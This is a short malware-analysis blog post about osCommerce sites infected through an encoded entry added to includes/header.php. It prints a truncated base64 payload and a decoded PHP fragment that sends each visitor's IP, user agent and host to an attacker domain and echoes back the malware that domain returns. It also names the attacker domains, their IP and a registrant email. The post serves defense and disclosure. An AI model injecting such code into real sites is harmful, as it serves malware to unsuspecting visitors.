Malware update: inininininininin.in (and oscommerce)

Quick malware update: We are seeing many osCommerce sites infected with malware managed by inininininininin.in, comcomcomcomcomcom.com and a few others. All the domains involved are hosted at 91.204.48.45.

These domains were registered by myid37@gmail.com, which is also involved on other malicious activities (serials-keys.com, wincrack.org, search-crack.org,etc).

The infected sites had a large encoded entry added to the file includes/header.php:

echo(base64_decode(“ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD…

Which when decoded, calls http://inininininininin.in/in.php to get what malware to present to the end user:

$url = @file_get_contents($h37.”:”.”//”.$c37.$c37.$c37.$c37.$c37.$c37.$c37.$c37.”.
$c37/”.$c37.”.ph”.”p?”.”i=”.$_SERVER[“REMOTE_ADDR”].”&b=”.urlencode($ua3).”&h=”.
urlencode($_SERVER[“HTTP_HOST”]));if (strstr($url,”!go!”)){$url = explode(“!go!”,$url); $url =
$url[1];echo $url;}

Some details here as well: http://sucuri.net/malware/entry/MW:JS:431


Having issues with malware? Sign up at http://sucuri.net and we will get it all sorted out.

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.